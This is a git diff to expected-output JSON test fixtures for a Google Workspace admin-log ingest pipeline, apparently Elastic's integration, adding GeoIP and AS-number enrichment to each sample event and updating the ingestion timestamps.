 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_CERTIFICATE_COMMON_NAME\",\"value\":\"cert\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "provider": "admin",
 "action": "REMOVE_MOBILE_CERTIFICATE",
@@ -1577,6 +1865,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -1586,7 +1886,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977657600Z",
+ "ingested": "2021-12-14T14:44:42.510371180Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT\"}}",
 "provider": "admin",
 "action": "ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT",
@@ -1636,6 +1936,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -1645,7 +1957,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977661800Z",
+ "ingested": "2021-12-14T14:44:42.510371555Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT\"}}",
 "provider": "admin",
 "action": "USE_GOOGLE_MOBILE_MANAGEMENT",
@@ -1695,6 +2007,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -1704,7 +2028,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977665700Z",
+ "ingested": "2021-12-14T14:44:42.510371928Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS\"}}",
 "provider": "admin",
 "action": "USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS",
@@ -1754,6 +2078,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -1763,7 +2099,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977670200Z",
+ "ingested": "2021-12-14T14:44:42.510372281Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS\"}}",
 "provider": "admin",
 "action": "USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS",
@@ -1818,6 +2154,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -1827,7 +2175,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977675400Z",
+ "ingested": "2021-12-14T14:44:42.510372645Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_ACCOUNT_WIPE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "MOBILE_ACCOUNT_WIPE",
@@ -1883,6 +2231,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -1892,7 +2252,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977680700Z",
+ "ingested": "2021-12-14T14:44:42.510373025Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE",
@@ -1948,6 +2308,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -1957,7 +2329,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:46.977686Z",
+ "ingested": "2021-12-14T14:44:42.510373383Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK",
diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log-expected.json
index f056c45c276..752554eb6af 100644
--- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log-expected.json
+++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log-expected.json
@@ -34,6 +34,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -43,7 +55,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:50.954861Z",
+ "ingested": "2021-12-14T14:44:47.354162155Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_LICENSES_ENABLED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CHROME_LICENSES_ENABLED\",\"value\":\"DISABLED\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "provider": "admin",
 "action": "CHROME_LICENSES_ENABLED",
@@ -98,6 +110,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -107,7 +131,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:50.954864400Z",
+ "ingested": "2021-12-14T14:44:47.354164687Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_CREATED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}",
 "provider": "admin",
 "action": "CHROME_APPLICATION_LICENSE_RESERVATION_CREATED",
@@ -162,6 +186,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -171,7 +207,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:38:50.954869700Z",
+ "ingested": "2021-12-14T14:44:47.354165122Z",
 "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_DELETED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}",
 "provider": "admin",
 "action": "CHROME_APPLICATION_LICENSE_RESERVATION_DELETED",
@@ -226,6 +262,18 @@
 "id": "1"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "user": {
 "name": "foo",
 "id": "1",
@@ -235,7 +283,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954875700Z", + "ingested": "2021-12-14T14:44:47.354165765Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}", "provider": "admin", "action": "CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED", @@ -290,6 +338,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -299,7 +359,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954881Z", + "ingested": "2021-12-14T14:44:47.354166093Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_DEVICE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"FULL_ORG_UNIT_PATH\",\"value\":\"full/org/path\"}]}}", "provider": "admin", "action": "CREATE_DEVICE_ENROLLMENT_TOKEN", 
@@ -354,6 +414,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -363,7 +435,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954884900Z", + "ingested": "2021-12-14T14:44:47.354166452Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"ASSIGN_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "ASSIGN_CUSTOM_LOGO", @@ -418,6 +490,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -427,7 +511,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954889100Z", + "ingested": "2021-12-14T14:44:47.354166782Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"UNASSIGN_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "UNASSIGN_CUSTOM_LOGO", 
@@ -482,6 +566,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -491,7 +587,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954894300Z", + "ingested": "2021-12-14T14:44:47.354167106Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CREATE_ENROLLMENT_TOKEN", @@ -546,6 +642,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -555,7 +663,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954898500Z", + "ingested": "2021-12-14T14:44:47.354167429Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REVOKE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "REVOKE_ENROLLMENT_TOKEN", 
@@ -610,6 +718,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -619,7 +739,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954902700Z", + "ingested": "2021-12-14T14:44:47.354167763Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_LICENSES_ALLOWED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CHROME_LICENSES_ALLOWED\",\"value\":\"EMPTY\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHROME_LICENSES_ALLOWED", @@ -674,6 +794,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -683,7 +815,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954906200Z", + "ingested": "2021-12-14T14:44:47.354168094Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_ORG_UNIT\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CREATE_ORG_UNIT", 
@@ -738,6 +870,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -747,7 +891,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954911Z", + "ingested": "2021-12-14T14:44:47.354168616Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REMOVE_ORG_UNIT\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "REMOVE_ORG_UNIT", @@ -802,6 +946,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -811,7 +967,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954916300Z", + "ingested": "2021-12-14T14:44:47.354168949Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"EDIT_ORG_UNIT_DESCRIPTION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "EDIT_ORG_UNIT_DESCRIPTION", 
@@ -864,6 +1020,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -873,7 +1041,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954921600Z", + "ingested": "2021-12-14T14:44:47.354169271Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"MOVE_ORG_UNIT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "MOVE_ORG_UNIT", @@ -926,6 +1094,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -935,7 +1115,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954926700Z", + "ingested": "2021-12-14T14:44:47.354169613Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"EDIT_ORG_UNIT_NAME\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "EDIT_ORG_UNIT_NAME", 
@@ -990,6 +1170,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -999,7 +1191,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954931900Z", + "ingested": "2021-12-14T14:44:47.354169943Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REVOKE_DEVICE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"FULL_ORG_UNIT_PATH\",\"value\":\"full/org/path\"}]}}", "provider": "admin", "action": "REVOKE_DEVICE_ENROLLMENT_TOKEN", @@ -1054,6 +1246,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -1063,7 +1267,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:50.954937300Z", + "ingested": "2021-12-14T14:44:47.354170396Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"TOGGLE_SERVICE_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SERVICE_NAME\",\"value\":\"new\"}]}}", "provider": "admin", "action": "TOGGLE_SERVICE_ENABLED", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log-expected.json index 02d23d9551d..7dc9779104c 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-security.log-expected.json @@ -34,6 +34,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
